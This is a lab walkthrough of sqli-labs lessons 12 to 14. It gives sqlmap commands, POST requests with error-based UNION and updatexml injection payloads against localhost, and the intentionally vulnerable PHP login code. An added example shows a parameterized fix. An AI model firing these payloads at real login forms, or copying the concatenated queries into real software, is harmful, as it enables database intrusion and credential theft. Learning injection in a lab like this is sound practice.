- Less-12 - POST - Error Based - Double Quotes - String
1) Knowledge points
This lesson mainly covers error-based injection where the input is closed with a double quotation mark.
2) Tool Usage:
Sqlmap usage for POST injection: add * at the injection point in the POST data, passing the URL with -u and the POST body with --data:

    sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-12/index.php" --data "uname=111*&passwd=111&submit=submit" --batch --technique BES
3) Manual Injection

    POST /hacker/sqli-labs-master/Less-12/index.php?id=1 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 98

    uname=111") UNION all SELECT 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=submit

4) Injection Point code

    // take the variables
    if (isset($_POST['uname']) && isset($_POST['passwd'])) {
        $uname = $_POST['uname'];
        $passwd = $_POST['passwd'];

        // logging the connection parameters to a file for analysis.
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'User Name:' . $uname . "\n");
        fwrite($fp, 'Password:' . $passwd . "\n");
        fclose($fp);

        // connectivity
        $uname = '"' . $uname . '"';    // double quotation mark closure
        $passwd = '"' . $passwd . '"';
        // the quoted values are then wrapped in parentheses inside the query
        @$sql = "SELECT username, password from users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
        $result = mysql_query($sql);
        $row = mysql_fetch_array($result);
        // ... (handler continues)
    }

- Less-13 - Double Injection - String - With Twist
1) Knowledge points
This lesson mainly covers error-based injection where the input is closed with a single quotation mark plus a parenthesis.
2) Tool Usage:

    sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php" --data "uname=111*&passwd=111&submit=submit" --batch --technique BES

3) Manual Injection

    POST /hacker/sqli-labs-master/Less-13/index.php?id=1 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 93

    uname=111') union Select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=submit

4) Injection Point generation code

    // take the variables
    if (isset($_POST['uname']) && isset($_POST['passwd'])) {
        $uname = $_POST['uname'];
        $passwd = $_POST['passwd'];

        // logging the connection parameters to a file for analysis.
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'User Name:' . $uname . "\n");
        fwrite($fp, 'Password:' . $passwd . "\n");
        fclose($fp);

        // connectivity: the raw values are wrapped in single quotes and parentheses
        @$sql = "SELECT username, password from users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
        $result = mysql_query($sql);
        $row = mysql_fetch_array($result);
        // ... (handler continues)
    }

- Less-14 - Double Injection - Double Quotes - String
1) Tool Usage:

    sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php" --data "uname=111*&passwd=111&submit=submit" --batch --technique BES

2) Manual Injection

    POST /hacker/sqli-labs-master/Less-14/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 92

    uname=111" union Select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=submit

3) Injection Point generation code

    if (isset($_POST['uname']) && isset($_POST['passwd'])) {
        $uname = $_POST['uname'];
        $passwd = $_POST['passwd'];

        // logging the connection parameters to a file for analysis.
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'User Name:' . $uname . "\n");
        fwrite($fp, 'Password:' . $passwd . "\n");
        fclose($fp);

        // connectivity: the values are wrapped in double quotes only, no parentheses
        $uname = '"' . $uname . '"';
        $passwd = '"' . $passwd . '"';
        @$sql = "SELECT username, password from users WHERE username=$uname and password=$passwd LIMIT 0,1";
        $result = mysql_query($sql);
        $row = mysql_fetch_array($result);
        // ... (handler continues)
    }

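
Added example (not part of the original page or of the sqli-labs code): the query shapes of Less-12, Less-13 and Less-14 rebuilt by concatenation, beside one parameterized lookup that treats the same input as data. It assumes PHP 7.4+ with PDO and the pdo_sqlite driver; the in-memory SQLite table, its sample row, and the function names lesson_query and find_user are made up for the example.

```php
<?php
// Added example. SQLite in memory stands in for the lab's MySQL database
// (assumption); lesson_query() and find_user() are hypothetical names.

// How Less-12/13/14 wrap the raw POST value before it reaches the query.
function lesson_query(int $less, string $uname, string $passwd): string {
    $wrap = [
        12 => fn($v) => '("' . $v . '")',   // double quotes inside parentheses
        13 => fn($v) => "('" . $v . "')",   // single quotes inside parentheses
        14 => fn($v) => '"' . $v . '"',     // double quotes only
    ][$less];
    return 'SELECT username, password from users WHERE username=' . $wrap($uname)
         . ' and password=' . $wrap($passwd) . ' LIMIT 0,1';
}

// Hardened lookup: values travel as bound parameters, never as SQL text,
// so the closure style of the surrounding query no longer matters.
function find_user(PDO $pdo, string $uname, string $passwd) {
    try {
        $stmt = $pdo->prepare(
            'SELECT username FROM users WHERE username = ? AND password = ? LIMIT 1');
        $stmt->execute([$uname, $passwd]);
        return $stmt->fetch(PDO::FETCH_ASSOC);   // array on match, false otherwise
    } catch (PDOException $e) {
        // Error-based extraction depends on database errors reaching the
        // response; log them server-side and return a generic failure.
        error_log($e->getMessage());
        return false;
    }
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (username TEXT, password TEXT)');
// Constructed sample row; plaintext password only to mirror the lab schema.
$pdo->exec("INSERT INTO users VALUES ('Dumb', 'Dumb')");

// The uname value from the Less-12 request shown on this page.
$uname = '111") UNION all SELECT 1,updatexml(1,concat(0x7e,database()),1) #';

// Concatenation: the value closes the literal, the rest is parsed as SQL.
echo lesson_query(12, $uname, '111'), "\n";
// Binding: the same bytes are compared as one string and match no row.
var_dump(find_user($pdo, $uname, '111'));
// A legitimate login still works.
var_dump(find_user($pdo, 'Dumb', 'Dumb'));
```

The printed query shows where the quote and parenthesis in the input end the string literal; the two find_user calls show that the bound version neither executes the appended SQL nor surfaces a database error.
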
"Mysql SQL Inject" "Getting Started" Sqli-labs using part 2